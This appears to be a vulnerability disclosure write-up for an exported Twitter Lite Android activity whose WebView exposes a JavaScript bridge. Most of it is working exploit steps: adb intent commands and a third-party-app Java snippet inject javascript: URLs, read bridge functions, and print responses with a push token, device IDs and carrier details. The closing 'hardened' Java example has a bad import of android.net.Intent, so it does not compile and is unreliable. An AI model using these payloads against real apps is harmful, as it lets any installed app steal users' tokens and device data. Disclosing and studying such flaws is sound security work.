Twitter Android Javascript Interface Vulnerability

Summary: com.twitter.android.lite.TwitterLiteActivity was exported, the data passed in the intent was not validated, and its WebView exposed a JavaScript interface (JSInterface) to any URL loaded through this activity, including insecure schemes such as file: and javascript: supplied via the intent.

Steps To Reproduce:

Get the victim's token through the JS interface:

  • Loop through each property of the window object in the WebView:

adb shell am start -a "android.intent.action.VIEW" -n com.twitter.android.lite/com.twitter.android.lite.TwitterLiteActivity -d "javascript://google.com%0Ajavascript:Object.getOwnPropertyNames(window).forEach(function(v%2C%20x)%20%7B%20document.writeln(v)%3B%20%7D)%3B"

At the bottom of the response there is an element called "apkInterface"; this is a JavaScript interface (bridge) between the web view and the app's native code.

  • We can see what's available in apkInterface:

adb shell am start -a "android.intent.action.VIEW" -n com.twitter.android.lite/com.twitter.android.lite.TwitterLiteActivity -d "javascript://google.com%0Ajavascript:Object.getOwnPropertyNames(window.apkInterface).forEach(function(v%2C%20x)%20%7B%20document.writeln(v)%3B%20%7D)%3B"

Two functions here are interesting: getApkPushParams and getNymizerParams.

  • Let's call these functions:

adb shell am start -a "android.intent.action.VIEW" -n com.twitter.android.lite/com.twitter.android.lite.TwitterLiteActivity -d "javascript://google.com%0Ajavascript:document.write(apkInterface.getApkPushParams())%3B"

Response: {"payload":{"client_application_id":141373,"push_device_info":{"env":3,"locale":"en-IN","os_version":"24","token":"Removed-XIHCvjwARIg8FL8TYxwJZL-TeN4caodfWnpXvV-Removed-UcglqNu3MHbDQVRgR","udid":"800a1bb6e7192d"}},"headers":{"x-twitter-client-version":"apk.2.1.0–25"}}

adb shell am start -a "android.intent.action.VIEW" -n com.twitter.android.lite/com.twitter.android.lite.TwitterLiteActivity -d "javascript://google.com%0Ajavascript:document.write(apkInterface.getNymizerParams())%3B"

Response: {"aid":"bf49d6c0-1fec-492f-95af-b81dbf680350","limit_ad_tracking":0,"country_code":"IN","dev_brand":"xiaomi","dev_model":"Redmi Note 4","dev_carrier":"Jio 4G","lang":"English","os_ver":24,"ts":1551107789748,"os_name":"android","action":"open","ref":"javascript://google.com%0Ajavascript:document.write(apkInterface.getNymizerParams());"}

We could also reproduce the above from a third-party app with the snippet below:

import android.content.Intent;
import android.net.Uri;

// Launch the exported activity directly, passing a javascript: URL as the intent data
Intent intent = new Intent();
intent.setClassName("com.twitter.android.lite", "com.twitter.android.lite.TwitterLiteActivity");
intent.setData(Uri.parse("javascript://google.com%0Ajavascript:document.write(apkInterface.getNymizerParams());"));
startActivity(intent);
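For comparison, here is an added example of the hardened form (hypothetical code written for this page, not Twitter's): the activity validates the intent data's scheme and host before any load, and re-checks each navigation, so a javascript: or file: URL never reaches a WebView that exposes a JavascriptInterface. The class, host and bridge method names are assumptions; where the activity does not need to be public at all, setting android:exported="false" in the manifest removes the entry point entirely.

```java
import android.app.Activity;
import android.content.Intent;
import android.net.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;
import android.webkit.WebViewClient;

// Hypothetical hardened activity (not Twitter's code): validates intent data
// before it ever reaches a WebView that exposes a JavascriptInterface.
public class HardenedLiteActivity extends Activity {
    // Assumption: only https pages on this host may talk to the bridge.
    private static final String ALLOWED_HOST = "mobile.twitter.com";
    static boolean isAllowed(Uri uri) {
        // Uri.parse("javascript://google.com%0Ajavascript:...") has scheme
        // "javascript", so this check rejects it along with file: and content:.
        return uri != null
                && "https".equalsIgnoreCase(uri.getScheme())
                && ALLOWED_HOST.equalsIgnoreCase(uri.getHost());
    }
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent intent = getIntent();
        Uri data = intent != null ? intent.getData() : null;
        if (!isAllowed(data)) {
            finish();            // untrusted input is dropped, never loaded
            return;
        }
        WebView webView = new WebView(this);
        setContentView(webView);
        webView.getSettings().setJavaScriptEnabled(true);
        webView.getSettings().setAllowFileAccess(false);
        // Re-check every navigation so a redirect cannot hand the bridge to
        // another origin after the initial load.
        webView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                return !isAllowed(Uri.parse(url)); // true blocks the load
            }
        });
        webView.addJavascriptInterface(new ApkBridge(), "apkInterface");
        webView.loadUrl(data.toString());
    }
    static class ApkBridge {
        @JavascriptInterface          // placeholder method, not the real bridge
        public String getClientVersion() { return "example"; }
    }
}
```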

Happy Hunting )